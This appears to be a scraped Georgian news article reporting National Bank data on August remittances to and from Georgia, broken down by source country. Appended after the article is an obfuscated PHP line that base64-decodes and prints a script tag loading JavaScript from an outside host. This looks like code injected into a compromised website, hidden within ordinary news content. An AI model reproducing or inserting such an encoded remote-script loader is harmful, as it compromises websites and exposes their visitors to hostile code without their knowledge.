celsiusi
ავერსი საქკაბელი

 აგვისტოში საქართველოში გადმორიცხული თანხების მოცულობამ, წინა წლის იმავე პერიოდთან შედარებით, 14.1%-ით დაიკლო და 287.0 მლნ აშშ დოლარი შეადგინა, ხოლო საქართველოდან გადარიცხული თანხების მოცულობა 1.0%-ით 29.2 მლნ აშშ დოლარამდე შემცირდა. ამის შესახებ ეროვნული ბანკის მიერ გამოქვეყნებულ ანგარიშშია აღნიშნული.

ცენტრალური ბანკის ინფორმაციით, რუსეთიდან ფულადი გადმორიცხვები აგვისტოში წლიურად 46%-ით შემცირდა.

„აგვისტოში რეგიონის ქვეყნებიდან, ყაზახეთიდან გადმორიცხული ფულადი სახსრები მნიშვნელოვნად, 54.9%-ით გაიზარდა, ხოლო ყირგიზეთიდან და აზერბაიჯანიდან გადმორიცხულმა თანხებმა დაიკლო, შესაბამისად 63.9%-ით და 20.2%-ით. გარდა ამისა, თურქეთიდან გადმორიცხულმა თანხებმა მცირედით დაიკლო, ხოლო უკრაინიდან გადმორიცხული ფულადი გზავნილები წინა წლის მინიმალურ დონესთან შედარებით გაზრდილია. მაღალი ტემპით, 37.6%-ით ზრდას განაგრძობს აშშ-დან გადმორიცხული ფულადი სახსრებიც. აგვისტოში ფულადი გზავნილების ძირითად წყაროს ევროკავშირის ქვეყნები, რუსეთი და აშშ წარმოადგენდა. ევროკავშირის ქვეყნებიდან აღსანიშნავია იტალიის, საბერძნეთისა და გერმანიის მაღალი წილი მთლიან ფულად გზავნილებში“, – აღნიშნულია ეროვნული ბანკის ანგარიშში.

786
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");